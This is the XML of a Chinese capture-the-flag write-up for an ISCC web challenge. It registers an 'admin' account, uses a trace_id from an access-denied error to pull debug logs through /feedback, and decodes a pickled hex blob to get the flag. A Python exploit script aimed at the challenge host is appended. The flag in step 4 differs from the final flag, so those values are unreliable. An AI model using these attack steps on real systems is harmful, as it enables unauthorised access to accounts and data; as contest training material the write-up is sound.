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header-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解题过程</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="header-n3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">夺取管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统居然允许用户直接创建名为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的账户，这暴露出其在管理员身份鉴权模型上存在严重缺陷。成功登入后，我们可以切换至管理后台视图，不仅能发现关键价值笔记，还能查看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/admin/hint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供的线索。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POST /register -&gt; username=admin&amp;password=admin123</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /login -&gt; username=admin&amp;password=admin123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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">管理员控制台首页展示了关键的笔记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ID：flag-project-001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以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin-notes-002。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">补充说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需要特别注意的是，正文中出现的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> secret </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关文本仅仅是迷惑性的诱导内容，切勿将其视作最终目标。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发核心对象的访问拒绝逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合前置提示信息，我们向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/v1/project/detail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起调用，并将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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数指定为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flag-project-001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。该操作并不会正常返回笔记详情，而是会命中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">access_denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（访问拒绝）的错误处理分支。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POST /api/v1/project/detail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{"project_id":"flag-project-001"}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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">{"error":"访问被拒绝","message":"您无权查看此笔记","trace_id":"&lt;trace-id&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">补充说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此处的重点并非是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 403 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报错本身，而是服务端在响应体中抛出了一个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。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n21"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trace_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取后台日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标站点的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/feedback</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由提供了一项功能：允许用户通过提交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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来查阅相应的报错日志记录。我们将上一步中收集到的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">填入并提交，即可获取完整的错误追踪详情。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POST /feedback</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">trace_id=&lt;trace-id&gt;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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志内容中记录了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message=尝试非法访问重要笔记，并且附带的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> stack_trace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是一长串十六进制字符。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">补充说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这表明真正的敏感信息泄露点并不在常规的业务数据流中，而是隐藏在系统的异常调试日志里。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n30"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">还原并解析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stack_trace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">核心发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">stack_trace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并非普通的文本报错栈，而是经过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码处理的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pickle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列化对象。我们需要将其转换为字节流（bytes）格式，随后利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pickle.loads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法将其反序列化为原始的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对象。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import pickle</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">obj = pickle.loads(bytes.fromhex(blob_hex))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">print(obj)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{'type': 'FLAG_OBJECT', 'flag': 'ISCC{c4refu11_debug_tr4ce_l34k_1d0r}', 'project_id': 'flag-project-001', 'timestamp': '...'}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">补充说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由于反序列化后的对象内部直接明文包含了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">键值对，因此本题最终的敏感数据完全来源于日志对象的异常暴露。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n39"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综上所述，本题的完整漏洞利用链条为：利用管理员注册校验漏洞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">触发重要目标访问异常以生成错误日志</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并回读调试日志</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对提取出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pickle-hex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据流进行离线解码还原。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python3 linggan_note_exp.py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ISCC{epGFk8uufXeN7RkWwnaufuwfr}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="15" w:name="header-n45"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录1：EXP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"http://39.105.213.28:5000"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ADMIN_USER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ADMIN_PASS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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_ID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"flag-project-001"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fetch_trace_log(session: requests.Session, trace_id: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/feedback"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trace_id},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resp.text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extract_hex_blob(html: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r'"stack_trace":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"Object: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"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, html)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r'"stack_trace":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"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"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, html)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locate stack_trace hex blob in feedback page"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requests.Session()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    session.trust_env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session.post(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/login"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ADMIN_USER,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ADMIN_PASS},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login.raise_for_status()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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session.post(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/api/v1/project/detail"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"project_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: TARGET_ID},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detail.json()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    trace_id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trace_id:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        detail.raise_for_status()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f"trace_id missing in response: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fetch_trace_log(session, trace_id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    blob_hex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extract_hex_blob(html)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   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pickle.loads(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.fromhex(blob_hex))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obj.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"flag"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flag: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f"decoded object does not contain flag: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(flag)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sys.exit(main())</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="header-n47"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录2：运行截图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pP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2026-05-16T03:56:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-16T03:56:32Z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